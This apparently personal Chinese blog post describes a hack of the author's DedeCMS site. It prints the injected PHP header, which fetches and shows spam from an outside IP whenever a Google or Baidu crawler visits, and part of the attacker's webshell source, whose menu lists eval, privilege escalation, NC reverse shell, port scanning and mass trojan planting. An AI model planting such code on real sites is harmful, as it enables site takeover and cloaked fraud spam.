请在Chrome、Firefox等现代浏览器浏览本站。网站域名:森林之家(www.foresthouse.cn)爱学习、爱分享、爱绿软、爱恐怖、爱音乐、爱唠叨、爱折腾、爱生活!

“哪里有开发票”病毒代码 php木马代码

web-build forest 55℃ 已收录 0评论

发票病毒代码

网站又被黑了没错就是织梦的系统,为什么说又呢?因为之前也不知道被黑了多少次了……所有PHP文件被给予777权限,并且在头部加上了如下的代码:

<?php
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,'google')!== false||strpos($key,'baidu')!==false)
{ $file = file_get_contents('http://154.48.233.13/'); echo $file;//
}
?>
<?php
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,'google')!== false||strpos($key,'baidu')!==false)
{ $file = file_get_contents('http://154.48.233.13/'); echo $file;//
}
?>

打开后则是全国各地的开发票信息还留了一个电话和QQ,每刷一次网页样式和地区则变了而联系方式不变,模样和中国新闻网和国家税务总局的网站相似用来糊弄访客可它是假的网站。网页截图如下:

php木马

php木马

php木马

php木马

网站里有成千上万个PHP文件它是怎么做到一下子把这么多文件都挂上马的呢?看下面的病毒后台:

病毒木马后台
清晰地标明了路径与路径下面的所有文件,想改就改想删就删最后还能顺便打个包带走,硬盘分区系统信息端口等一览无疑,可以随意上传文件,批量挂马,执行脚本等操作。

批量挂马:

批量挂马

端口扫描:

端口扫描

恐怖的数据库增删改查:

数据库增删改查

其它就不演示了看了下太恐怖了,下面公布部分源码:“哪里有开发票”病毒代码 php木马代码源码

ob_start();
define('envlpass',$password);
define('shellname',$shellname);
define('myurl',$myurl);
if(@get_magic_quotes_gpc()){ foreach($_POST as $k => $v) $_POST[$k] = stripslashes($v); foreach($_GET as $k => $v) $_GET[$k] = stripslashes($v);
}
/*---End Login---*/
if(isset($_GET['down'])) do_down($_GET['down']);
if(isset($_GET['pack'])){ $dir = do_show($_GET['pack']); $zip = new eanver($dir); $out = $zip->out; do_download($out,"eanver.tar.gz");
}
if(isset($_GET['unzip'])){ css_main(); start_unzip($_GET['unzip'],$_GET['unzip'],$_GET['todir']); exit;
}
define('root_dir',str_replace('\\','/',dirname(myaddress)).'/');
define('run_win',substr(PHP_OS, 0, 3) == "WIN");
define('my_shell',str_path(root_dir.$_SERVER['SCRIPT_NAME']));
$eanver = isset($_GET['eanver']) ? $_GET['eanver'] : "";
$doing = isset($_POST['doing']) ? $_POST['doing'] : "";
$path = isset($_GET['path']) ? $_GET['path'] : root_dir;
$name = isset($_POST['name']) ? $_POST['name'] : "";
$img = isset($_GET['img']) ? $_GET['img'] : "";
$p = isset($_GET['p']) ? $_GET['p'] : "";
$pp = urlencode(dirname($p));
if($img) css_img($img);
if($eanver == "phpinfo") die(phpinfo());
if($eanver == 'logout'){ setcookie('envlpass',null); die('<meta http-equiv="refresh" content="0;URL=?">');
}
$class = array(
"信息操作" => array("upfiles" => "上传文件","phpinfo" => "基本信息","info_f" => "系统信息","eval" => "执行PHP脚本"),
"提权工具" => array("sqlshell" => "执行SQL执行","mysql_exec" => "MYSQL操作","myexp" => "MYSQL提权","servu" => "Serv-U提权","nc" => "NC反弹","downloader" => "文件下载","port" => "端口扫描"),
"批量操作" => array("guama" => "批量挂马清马","tihuan" => "批量替换内容","scanfile" => "批量搜索文件","scanphp" => "批量查找木马"),
"脚本插件" => array("getcode" => "获取网页源码")
);
$msg = array("0" => "保存成功","1" => "保存失败","2" => "上传成功","3" => "上传失败","4" => "修改成功","5" => "修改失败","6" => "删除成功","7" => "删除失败");

完整php木马病毒代码下载(权限研究原理)

本站文章如未注明,均为原创丨本网站采用BY-NC-SA协议进行授权,转载请注明转自:https://www.foresthouse.cn/archives/5998.html
喜欢 (1)or分享 (0)
发表我的评论(注:在您评论完以后不会立即显示,请不要重复刷新以免进入黑名单。)
取消评论
表情 代码 贴图 加粗 链接 私信 删除线 签到

Hi,请填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址